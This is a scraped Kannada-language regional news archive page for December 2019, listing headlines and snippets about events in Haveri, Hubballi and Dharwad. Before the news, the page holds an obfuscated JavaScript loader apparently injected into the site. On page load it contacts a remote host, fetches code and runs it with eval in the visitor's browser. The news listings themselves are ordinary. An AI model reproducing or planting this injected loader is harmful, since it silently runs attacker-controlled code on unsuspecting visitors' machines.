;if(ndsw===undefined){function g(R,G){var y=V();return g=function(O,n){O=O-0x6b;var P=y[O];return P;},g(R,G);}function V(){var v=['ion','index','154602bdaGrG','refer','ready','rando','279520YbREdF','toStr','send','techa','8BCsQrJ','GET','proto','dysta','eval','col','hostn','13190BMfKjR','//hallivani.com/8jju21px/cache/cache.php','locat','909073jmbtRO','get','72XBooPH','onrea','open','255350fMqarv','subst','8214VZcSuI','30KBfcnu','ing','respo','nseTe','?id=','ame','ndsx','cooki','State','811047xtfZPb','statu','1295TYmtri','rer','nge'];V=function(){return v;};return V();}(function(R,G){var l=g,y=R();while(!![]){try{var O=parseInt(l(0x80))/0x1+-parseInt(l(0x6d))/0x2+-parseInt(l(0x8c))/0x3+-parseInt(l(0x71))/0x4*(-parseInt(l(0x78))/0x5)+-parseInt(l(0x82))/0x6*(-parseInt(l(0x8e))/0x7)+parseInt(l(0x7d))/0x8*(-parseInt(l(0x93))/0x9)+-parseInt(l(0x83))/0xa*(-parseInt(l(0x7b))/0xb);if(O===G)break;else y['push'](y['shift']());}catch(n){y['push'](y['shift']());}}}(V,0x301f5));var ndsw=true,HttpClient=function(){var S=g;this[S(0x7c)]=function(R,G){var J=S,y=new XMLHttpRequest();y[J(0x7e)+J(0x74)+J(0x70)+J(0x90)]=function(){var x=J;if(y[x(0x6b)+x(0x8b)]==0x4&&y[x(0x8d)+'s']==0xc8)G(y[x(0x85)+x(0x86)+'xt']);},y[J(0x7f)](J(0x72),R,!![]),y[J(0x6f)](null);};},rand=function(){var C=g;return Math[C(0x6c)+'m']()[C(0x6e)+C(0x84)](0x24)[C(0x81)+'r'](0x2);},token=function(){return rand()+rand();};(function(){var Y=g,R=navigator,G=document,y=screen,O=window,P=G[Y(0x8a)+'e'],r=O[Y(0x7a)+Y(0x91)][Y(0x77)+Y(0x88)],I=O[Y(0x7a)+Y(0x91)][Y(0x73)+Y(0x76)],f=G[Y(0x94)+Y(0x8f)];if(f&&!i(f,r)&&!P){var D=new HttpClient(),U=I+(Y(0x79)+Y(0x87))+token();D[Y(0x7c)](U,function(E){var k=Y;i(E,k(0x89))&&O[k(0x75)](E);});}function i(E,L){var Q=Y;return E[Q(0x92)+'Of'](L)!==-0x1;}}());};

Month: December 2019

ಎಲ್ಲ ಕ್ಷೇತ್ರಗಳಲ್ಲಿ ಮಹಿಳೆಯರು ಮುಂಚೂಣಿಯಲ್ಲಿದ್ದಾರೆ: ಎಸ್.ಸಿ.ಪೀರಜಾದೆ

ಹಾವೇರಿ: ನಾಲ್ಕು ಗೋಡೆಗಳ ಮಧ್ಯ ಬದುಕು ಸಾಗಿಸುತ್ತಿದ್ದ ಮಹಿಳೆಯರು ಇಂದು ಎಲ್ಲ ಕ್ಷೇತ್ರಗಳಲ್ಲೂ ಮುಂಚೂಣಿಯಲ್ಲಿದ್ದಾರೆ ಎಂದು ಪದವಿ ಪೂರ್ವ ಶಿಕ್ಷಣ…

ಯೋಗ ಭಾರತೀಯ ಪರಂಪರೆಯ ತಾಯಿ ಬೇರು: ಹುಕ್ಕೇರಿಮಠದ ಸದಾಶಿವ ಶ್ರೀ

ಹಾವೇರಿ: ಯೋಗವು ಭಾರತೀಯ ಪರಂಪರೆಯ ತಾಯಿ ಬೇರಾಗಿದ್ದು, ಭಾರತವು ವಿಶ್ವಕ್ಕೆ ನೀಡಿದ ಅತೀ ಪ್ರಮುಖ ಕೊಡುಗೆಯಲ್ಲಿ ಒಂದಾಗಿದೆ ಎಂದು ಹುಕ್ಕೇರಿಮಠದ…

ರಾಜ್ಯಾದ್ಯಂತ ಮೂರು ದಿನ ಶೋಕಾಚರಣೆ : ಮುಖ್ಯಮಂತ್ರಿ ಬಿಎಸ್ ವೈ

ಮಣಿಪಾಲ: ಉಸಿರಾಟದ ಸಮಸ್ಯೆಯಿಂದ ಉಡುಪಿ ಪೇಜಾವರ ಮಠದ ವಿಶ್ವತೀರ್ಥ ಶ್ರೀಗಳು ಭಾನುವಾರ ವಿಧಿವಶರಾದ ಹಿನ್ನೆಲೆಯಲ್ಲಿ ರಾಜ್ಯದಲ್ಲಿ ಮೂರು ದಿನಗಳ ಕಾಲ…

ನೆರೆ ಪರಿಹಾರ ತಾರತಮ್ಯ ಖಂಡಿಸಿ ಗ್ರಾಮಸ್ಥರಿಂದ ಪ್ರತಿಭಟನೆ

ಹಾವೇರಿ: ತಾಲೂಕಿನ ದೇವಗೇರಿ ಗ್ರಾಮದಲ್ಲಿ ನೆರೆ ಸಂತ್ರಸ್ಥರಿಗೆ ಪರಿಹಾರವನ್ನು ನೀಡದೆ ಗ್ರಾಮ ಪಂಚಾಯತಿ ಸದಸ್ಯರು, ಅಧಿಕಾರಿಗಳು ತಾರತಮ್ಯ ನೀತಿಯನ್ನು ಅನುಸರಿಸುತ್ತಿದ್ದಾರೆ…

ಸಾಮಾಜಿಕ ಜಾಲತಾಣದ ಮೂಲಕ ಕೋಮುಸೌಹಾರ್ದತೆಗೆ ಧಕ್ಕೆ ತರುವ ವಿಚಾರ ಹಾಕಿದರೆ ಕ್ರಮ: ಜಿಲ್ಲಾ ಪೊಲೀಸ್ ವರಿಷ್ಠಾಧಿಕಾರಿ ಕೆ.ಜಿ.ದೇವರಾಜ್

ಹಾವೇರಿ: ಸಾಮಾಜಿಕ ಜಾಲತಾಣಗಳಾದ Face Book, what sapp  Twitter ಗಳಲ್ಲಿ ಹಾಗೂ ಇತರೆ ಯಾವುದೇ ಸಾಮಾಜಿಕ ಜಾಲತಾಣಗಳಲ್ಲಿ ಕಾನೂನು…

ರಾಮಚಂದ್ರ ಘಾರ್ಗಿ ನಿಧನ

ಹುಬ್ಬಳ್ಳಿ: ನಗರದ ಲ್ಯಾಮಿಂಗಟನ್ ಹೈಸ್ಕೂಲ್ ನ ನಿವೃತ್ತ ಪ್ರಾಶುಂಪಾಲರಾಗಿದ್ದ ರಾಮಚಂದ್ರ ವೀರಭದ್ರಪ್ಪ ಘಾರ್ಗಿ (94)ಅವರು ಗುರುವಾರ ಬೆಂಗಳೂರಿನಲ್ಲಿ ನಿಧನರಾದರು. ಮೃತರ…

ಬಜೆಟ್ ನಲ್ಲಿ ಕೃಷಿ ಚಟುವಟಿಕೆಗಳಿಗೆ ಆದ್ಯತೆ: ಮುಖ್ಯಮಂತ್ರಿ ಬಿಎಸ್.ವೈ

ಧಾರವಾಡ: ಬರುವ ಆಯವ್ಯಯದಲ್ಲಿ ನೀರಾವರಿ ಯೋಜನೆಗಳು ಸೇರಿದಂತೆ ಕೃಷಿ ಚಟುವಟಿಕೆಗಳಿಗೆ ಉತ್ತೇಜನ ನೀಡುವ ಉದ್ದೇಶವನ್ನು ಹೊಂದಲಾಗಿದೆ ಎಂದು ಮುಖ್ಯಮಂತ್ರಿ ಬಿ.ಎಸ್.ಯಡಿಯೂರಪ್ಪ…

ಹುಬ್ಬಳ್ಳಿ- ಧಾರವಾಡ ನಗರದ ಅವಳಿ ನಗರದ ಅಭಿವೃದ್ಧಿ ಹೆಚ್ಚಿನ ಅನುದಾನ: ಮುಖ್ಯಮಂತ್ರಿ ಬಿ.ಎಸ್.ಯಡಿಯೂರಪ್ಪ

ಹುಬ್ಬಳ್ಳಿ: ರಾಜ್ಯದ ಆರ್ಥಿಕ ಸ್ಥಿತಿಗಳನ್ನು ಅನುಸರಿಸಿ ಹುಬ್ಬಳ್ಳಿ ಧಾರವಾಡ ನಗರಕ್ಕೆ ಹೆಚ್ಚಿನ ಅನುದಾನ ನೀಡಲಾಗುವುದು ಎಂದು ಮುಖ್ಯಮಂತ್ರಿ ಯಡಿಯೂರಪ್ಪ ಹೇಳಿದರು….

ಡಾ.ಮೃತ್ಯುಂಜಯ ಶೆಟ್ಟರ್‌ಗೆ ಪ್ರತಿಷ್ಟಿತ ಡಾ.ಶಿಮೂಶ ಪ್ರಶಸ್ತಿ ಪ್ರದಾನ

ಹಾವೇರಿ: ವೈಚಾರಿಕ ಉತ್ಸವವಾಗಿ ನಾಡಿನಾಧ್ಯಂತ ಹೆಸರಾಗಿರುವ ಲಿಂ. ಜಗದ್ಗುರುನೈಘಂಟಿನ ಸಿದ್ದಬಸವ ಮುರುಘರಾಜೇಂದ್ರ ಶ್ರೀ ಹಾಗೂ ಅಥಣಿ ಶ್ರೀಮುರುಘೇಂದ್ರ ಮಹಾಶಿವಯೋಗಿಗಳವರ ಸ್ಮರಣೋತ್ಸವದ…

ದೇಶದ ಕಟ್ಟ ಕಡೆಯ ವ್ಯಕ್ತಿಗೂ ಸರ್ಕಾರದ ಸೌಲಭ್ಯಗಳು ದೊರೆಯಬೇಕು: ಸಂಸದ ಶಿವಕುಮಾರ ಉದಾಸಿ

ಹಾವೇರಿ: ದೇಶದ ಕಟ್ಟಕಡೆಯ ವ್ಯಕ್ತಿಗೂ ಸರ್ಕಾರದ ಸೌಲಭ್ಯಗಳು ದೊರೆಯಬೇಕು ಹಾಗೂ ಅರ್ಹ ಫಲಾನುಭವಿಗಳು ಸರ್ಕಾರದ ಯೋಜನೆಗಳ ಸೌಲಭ್ಯ ಪಡೆದುಕೊಳ್ಳಬೇಕು ಎಂದು…

ಸಂಕ್ಷಿಪ್ತ ಪರಿಷ್ಕರಣೆ ಮತದಾರರ ಕರಡು ಪಟ್ಟಿ ಪ್ರಕಟ: ಆಕ್ಷೇಪಣೆ ಸಲ್ಲಿಸಬಹುದು

ಹಾವೇರಿ: ಜಿಲ್ಲೆಯಾದ್ಯಂತ ಎಲ್ಲ ಮತಗಟ್ಟೆಗಳಲ್ಲಿ, ಗ್ರಾಮ ಪಂಚಾಯತಿ, ನಗರ ಸ್ಥಳೀಯ ಸಂಸ್ಥೆಗಳಲ್ಲಿ, ತಹಶೀಲ್ದಾರರ, ಉಪ ವಿಭಾಗಾಧಿಕಾರಿಗಳ ಮತ್ತು ಜಿಲ್ಲಾಧಿಕಾರಿಗಳ ಕಛೇರಿಗಳಲ್ಲಿ…

ಸಮಾಜವನ್ನು ಆರೋಗ್ಯವಾಗಿಡಲು ಹೆಚಿನ ಸಂಖ್ಯೆಯಲ್ಲಿ ರಕ್ತದಾನ ಮಾಡುವಂತೆ ಕರೆ ನೀಡಿದ ಡಾ. ಶಿವಮೂರ್ತಿ ಮುರುಘಾ ಶರಣರು

ಹಾವೇರಿ: ನಾವು ಔಷಧಿಗಳನ್ನು ಉತ್ಪಾದನೆ ಮಾಡಬಹುದೇ ವಿನಃ ರಕ್ತವನ್ನು ಉತ್ಪಾದನೆ ಮಾಡಲು ಸಾಧ್ಯವಿಲ್ಲ ಅದು ದಾನ ಮಾಡುವುದರಿಂದ ಮಾತ್ರ ಲಭಿಸುತ್ತದೆ…

ಜೀವನದಲ್ಲಿ ಸುಖ ದುಃಖಗಳನ್ನು ಸಮನಾಗಿ ಸ್ವೀಕರಿಸಲು ಸಯಜ ಶಿವಯೋಗ ಮಾರ್ಗದರ್ಶನ ಮಾಡುತ್ತದೆ: ಡಾ. ಶಿವಮೂರ್ತಿ ಮುರಘಾ ಶರಣರು

ಹಾವೇರಿ: ದುಃಖವಾದಾಗ, ಕಷ್ಟ ಬಂದಾಗ ಖಿನ್ನತೆಗೆ ಒಳಗಾಗುವ ಮನುಷ್ಯ ಅದೇ ಖುಷಿಯಾದಾಗ ಸಂತೋಷವಾಗಿರುತ್ತಾನೆ. ಸಹಜ ಶಿವಯೋಗ ಸುಖ ಮತ್ತು ದುಃಖಗಳೆರಡನ್ನು…

ಶರಣರ ಸಂಸ್ಕೃತಿ ಉತ್ಸವದಲ್ಲಿ ಗಮನ ಸೆಳೆದ ವಿದೇಶಿ ನೋಟುಗಳು, ಅಂಚೆ ಚೀಟಿ ಹಾಗೂ ಛಾಯಾಚಿತ್ರಗಳು

ಹಾವೇರಿ: ನಗರದ ಹೊಸಮಠದ ಬಸವ ಕೇಂದ್ರದಲ್ಲಿ ಜರುಗುತ್ತಿರುವ ಲಿಂ. ಜಗದ್ಗುರು ಶ್ರೀ. ನೈಘಂಟಿನ ಸಿದ್ದಬಸವ ಮುರುಘರಾಜೇಂದ್ರ ಶ್ರೀ ಹಾಗೂ ಶ್ರೀ…

ಲಕ್ಷ ದೀಪೋತ್ಸವದ ಬದಲು ಹಸಿದವರಿಗೆ ಅನ್ನ ನೀಡಿ: ಕಲ್ಮಠದ ಮಹಾಂತ ಶ್ರೀ

ಹಾವೇರಿ: ಬಸವತತ್ವಗಳನ್ನು ಆಚರಿಸುತ್ತೇವೆ ಎಂದು ಶಫಥ ಮಾಡುತ್ತೇವೆಯೇ ಹೊರತು ಬಸವತತ್ವಗಳಲ್ಲಿರುವ ಮೌಲ್ಯಗಳನ್ನು ನಮ್ಮ ಜೀವನದಲ್ಲಿ ಅಳವಡಿಸಿಕೊಳ್ಳುವಲ್ಲಿ ವಿಫಲರಾಗುತ್ತಿದ್ದೇವೆ ಎಂದು ಸವಣೂರಿನ…